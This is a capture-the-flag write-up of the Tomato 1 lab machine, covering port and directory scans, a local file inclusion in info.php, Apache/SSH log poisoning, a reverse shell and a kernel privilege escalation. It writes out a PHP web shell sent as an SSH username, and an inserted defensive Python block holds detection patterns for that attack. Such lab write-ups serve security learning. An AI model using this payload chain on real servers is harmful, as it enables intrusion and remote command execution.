Tomato 1: CTF Write-Up
Tomato 1 is another CTF created by the SunCSR Team. It is rated as a Medium to Hard box.
Having already gone through it, I would say that it sits more on the medium side than the hard side.
The privilege escalation is pretty standard, but the enumeration can be a bit tricky. I tried to load this VM in VirtualBox, but I had problems getting the networking to work. Once I loaded it into VMware, I instantly got the IP through netdiscover. Let's start with enumeration and check out this fun box!
Enumeration
I started out with a simple Nmap scan.
user@kali:~/Desktop$ nmap -sV -Pn -A -p- 192.168.1.112
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 15:37 EDT
Nmap scan report for ubuntu.attlocal.net (192.168.1.112)
Host is up (0.00069s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomato
2211/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
| 256 b3:12:60:32:48:28:eb:ac:80:de:17:d7:96:77:6e:2f (ECDSA)
|_ 256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
8888/tcp open http nginx 1.10.3 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Private Property
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: 401 Authorization Required
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.22 seconds
user@kali:~/Desktop$
We have a few ports open: FTP, two web servers, and an SSH service running on a non-standard port. I tried to log into FTP anonymously, but anonymous login was not enabled, so I moved on to the first web server.
I ran a Dirb scan against the web server and found the antibot_image directory.
user@kali:~/Desktop$ dirb http://192.168.1.112
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Sep 29 15:43:21 2020
URL_BASE: http://192.168.1.112/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.112/ ----
==> DIRECTORY: http://192.168.1.112/antibot_image/
+ http://192.168.1.112/index.html (CODE:200|SIZE:652)
+ http://192.168.1.112/server-status (CODE:403|SIZE:278)

---- Entering directory: http://192.168.1.112/antibot_image/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Sep 29 15:43:26 2020
DOWNLOADED: 4612 - FOUND: 2
user@kali:~/Desktop$
Dirb didn't offer much more. I browsed to the directory, which is listable, and clicked through to the antibots subdirectory. This gave me a few files to look at.
I checked through some of the PHP files but didn't find anything interesting until I reached info.php. Its page source showed that it reads an image parameter from a GET request.
I ran my LFI scanner against that parameter to test for a local file inclusion vulnerability.
The LFI scanner confirmed the vulnerability, so I used it to pull /etc/passwd.
I ran Hydra against the FTP service with the tomato user and the rockyou.txt wordlist, but didn't get anywhere. Same with the SSH service. So I decided to see if I could poison the Apache logs.
As you can see here, I was able to pull the log, which showed all of Hydra's failed login attempts.
Since I could read the log through the LFI, I knew I could poison it. I injected PHP code into the log via SSH: I used the PHP payload as the SSH username and entered a random password, so the failed attempt, username included, was written to the log.
user@kali:~/Desktop$ ssh '<?php system($_GET['cmd']); ?>'@192.168.1.112 -p 2211
<?php system($_GET[cmd]); ?>@192.168.1.112's password:
Permission denied, please try again.
<?php system($_GET[cmd]); ?>@192.168.1.112's password:
Permission denied, please try again.
<?php system($_GET[cmd]); ?>@192.168.1.112's password:
<?php system($_GET[cmd]); ?>@192.168.1.112: Permission denied (publickey,password).
user@kali:~/Desktop$
After the log was poisoned, I tested it by including the log through the LFI and passing an ls command in the cmd parameter. As you can see from the screenshot, the server returned the directory listing, and the log entry showed the command coming from my internal IP.
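A defender-side check for the two steps above (PHP tags landing in the sshd log, and an include parameter pointed at a system file or a log), added here as an example; it is not code from the write-up, runs over constructed sample lines, and assumes the log path and the parameter names it matches on:

```python
import re

# Constructed sample lines, not taken from the target: sshd failures as they
# appear in auth.log, and Apache access-log entries for the vulnerable script.
AUTH_LOG = """\
Sep 29 16:02:11 ubuntu sshd[1402]: Invalid user <?php system($_GET[cmd]); ?> from 192.168.1.50 port 51622
Sep 29 16:02:14 ubuntu sshd[1402]: Failed password for invalid user <?php system($_GET[cmd]); ?> from 192.168.1.50 port 51622 ssh2
Sep 29 16:05:01 ubuntu sshd[1410]: Accepted password for tomato from 192.168.1.50 port 51700 ssh2
"""

ACCESS_LOG = """\
192.168.1.50 - - [29/Sep/2020:16:03:40 -0400] "GET /antibot_image/antibots/info.php?image=/etc/passwd HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
192.168.1.50 - - [29/Sep/2020:16:04:02 -0400] "GET /antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=ls HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
192.168.1.51 - - [29/Sep/2020:16:04:30 -0400] "GET /antibot_image/antibots/info.php?image=logo.png HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

# A PHP open tag has no business inside an SSH username.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
# Parameter names are an assumption; extend the list for the application in question.
INCLUDE_PARAM = re.compile(r"[?&](?:image|file|page)=(?P<value>[^& ]*)", re.IGNORECASE)
# Values that point outside the web root: traversal, system/log paths, PHP wrappers.
SUSPICIOUS_VALUE = re.compile(r"(\.\./|^/etc/|^/var/log/|^/proc/|php://|data:)", re.IGNORECASE)


def find_poisoned_auth_entries(text):
    """Return sshd log lines whose recorded username carries a PHP tag."""
    return [line for line in text.splitlines() if "sshd" in line and PHP_TAG.search(line)]


def find_lfi_requests(text):
    """Return (client_ip, parameter_value) for requests that include a suspicious path."""
    hits = []
    for line in text.splitlines():
        match = INCLUDE_PARAM.search(line)
        if match and SUSPICIOUS_VALUE.search(match.group("value")):
            hits.append((line.split()[0], match.group("value")))
    return hits


if __name__ == "__main__":
    for entry in find_poisoned_auth_entries(AUTH_LOG):
        print("poisoned sshd entry:", entry)
    for ip, value in find_lfi_requests(ACCESS_LOG):
        print(f"suspicious include from {ip}: image={value}")
```

A request that first reads /etc/passwd and then includes a log file from the same client IP, combined with a PHP tag in that log, is the full chain described above and is worth alerting on as one incident.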
Since I had remote command execution, I turned to getting a shell. I fired up Burp Suite, turned on the proxy in Firefox, and requested the URL with the cmd parameter so I could capture the GET request.
I intercepted the request.
I entered a reverse shell into the cmd parameter, but it took a few attempts. I went through most of the reverse shells from the pentestmonkey page before finding one that worked. Before it would work, though, I needed to encode the shell.
I clicked on the URL-encode all characters option.
I set up a Netcat listener on port 80 and forwarded the GET request. This gave me a reverse shell.
I set up a Python web server and transferred linpeas.sh over to the target to enumerate for privilege escalation.
The script instantly found the privilege escalation vector: the kernel was vulnerable to a local privilege escalation exploit. I went through a few kernel exploits before I arrived at this one.
I followed the compiling directions and transferred the binary to the target.
Finally, I grabbed the root flag.
This was a really fun box. It gave me a chance to stretch those Apache log poisoning muscles that I had not used in quite a while. For more CTFs, follow me here on Medium or on Twitter @assume_breach.